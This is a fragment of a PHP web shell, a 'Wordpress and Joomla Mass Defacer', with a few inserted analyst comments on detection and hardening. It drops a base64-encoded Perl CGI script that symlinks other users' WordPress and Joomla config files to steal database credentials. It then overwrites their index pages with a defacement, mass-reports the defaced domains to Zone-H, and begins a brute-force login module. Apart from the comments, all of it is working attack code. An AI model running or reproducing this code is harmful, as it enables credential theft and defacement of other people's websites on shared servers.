fwrite($output, 'http://'.$domain."
");
$count2++;
} else {echo 'FAILED | ';
}echo '
';
}}echo '
';
echo '
';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';
echo 'View Total Defaced urls
';
if($count1+$count2 > 0){echo 'Send to Zone-H';
}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num
");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo 'ID | SID | Domain | Type | Action | Status |
';
$j = 1;
$map = array();
foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
// Analyst note: same staging sequence as exec_mode_2, with one addition -- the raw
// POST field `man_data` is written unvalidated to plsym/data.txt before the
// decoded script is dropped.
mkdir('plsym',0777);
file_put_contents('plsym/data.txt', $_POST['man_data']);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
// Registers `.cc` as a CGI script extension and enables ExecCGI, FollowSymLinks
// and Indexes for the directory.
// Detection: plsym/ containing data.txt and an .htaccess with
// `AddHandler cgi-script .cc`.
// Hardening: an AllowOverride setting that excludes Options and FileInfo.
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
// fopen() result is unchecked before the write and close.
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
// The script is run via an HTTP request to this host and then removed from disk;
// the access-log entry for /plsym/plsym.cc and the leftover data.txt are the
// artifacts that survive.
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('//', $data, $match);
unset($match[1][0]);
$i=1;
foreach($match[1] as $m){$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);
}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);
}$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){echo ''.($j++).' | '.($i++).' | '.$domain.' | ';
echo 'JOOMLA | ';
$res = index_changer_joomla($config01, $def, $domain);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count1++;
} else {echo 'FAILED | ';
}echo '
';
}if($config02 && preg_match('/DB_NAME/i',$config02)){echo ''.($j++).' | '.$domain.' | ';
echo 'WORDPRESS | ';
$res = index_changer_wp($config02, $def);
echo ''.$res['output'].' | ';
if($res['cond']) {echo 'DEFACED | ';
fwrite($output, 'http://'.$domain."
");
$count2++;
} else {echo 'FAILED | ';
}echo '
';
}}echo '
';
echo '
';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')
';
echo 'View Total Defaced urls
';
if($count1+$count2 > 0){echo 'Send to Zone-H';
}}echo 'Wordpress and Joomla Mass Defacer
';
if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '';
}$milaf_el_index = $_POST['defpage'];
if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index);
}if($_POST['mode']==2) { exec_mode_2($milaf_el_index);
}if($_POST['mode']==3) { exec_mode_3($milaf_el_index);
}}if($_GET['mode']==1) { exec_mode_1($milaf_el_index);
}echo '';
} elseif(isset($_GET['x']) && ($_GET['x'] == 'zone-h')){$defacer='ReZK2LL';
$display_details=0;
$method=14;
$reason=5;
error_reporting(0);
set_time_limit(0);
if(!function_exists('curl_init')){echo "CURL ERROR\n";
exit;
}$cli=(isset($argv[0]))?1:0;
if($cli==1){$file=$argv[1];
$sites=file($file);
}if(function_exists(apache_setenv)){@apache_setenv('no-gzip', 1);
}@ini_set('zlib.output_compression', 0);
@ini_set('implicit_flush', 1);
@ob_implicit_flush(true);
@ob_end_flush();
if(isset($_POST['domains'])){$sites=explode("\n",$_POST['domains']);
}if (file_exists($_FILES["file"]["tmp_name"])){$file=$_FILES["file"]["tmp_name"];
$sites=file($file);
} echo <<
EOF;
if(!isset($_POST['defacer'])){ echo <<Zone-H Poster
';
exit;
}$sites=array_unique(str_replace('http://','',$sites));
$total=count($sites);
echo "[+] Total unique domain: $total\n\n";
$pause=10;
$start=time();
$main=curl_multi_init();
for($m=0;
$m<3;
$m++){$http[] = curl_init();
}for($n=0;
$n<$total;
$n +=30){if($display_details==1){for($x=0;
$x<30;
$x++){echo'[+] Adding '.rtrim($sites[$n+$x]).'';
echo "\n";
}}$d=$n+30;
if($d>$total){$d=$total;
}echo "=====================>[$d/$total]\n";
for($w=0;
$w<3;
$w++){$p=$w * 10;
if(!(isset($sites[$n+$p]))){$pause=$w;
break;
}$posts[$w]="defacer=$defacer&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=".$method."&reason=".$reason."&submit=Send";
$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1;
WOW64) AppleWebKit/535.16 (KHTML, like Gecko) Chrome/18.0.1003.1 Safari/535.16',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_ENCODING => true,CURLOPT_HEADER => false,CURLOPT_HTTPHEADER => array("Keep-Alive: 7"),CURLOPT_CONNECTTIMEOUT => 3,CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
curl_setopt_array($http[$w],$curlopt);
curl_multi_add_handle($main,$http[$w]);
}$running = null;
do{curl_multi_exec($main,$running);
}while($running > 0);
for($m=0;
$m<3;
$m++){if($pause==$m){break;
}curl_multi_remove_handle($main, $http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if ($code != 200) {while(true){echo' [-]Error!....Retrying';
echo "\n";
sleep(5);
curl_exec($http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if( $code== 200){break 1;
}}}}}$end= time() - $start;
echo 'Done';
echo "\n\n[*]Time: $end seconds\n";
curl_multi_close($main);
if($cli==0){echo '';
}exit;
} elseif(isset($_GET['x']) && ($_GET['x'] == 'brute')){$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['submit'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if($target == ""){$target = "localhost";
}
?>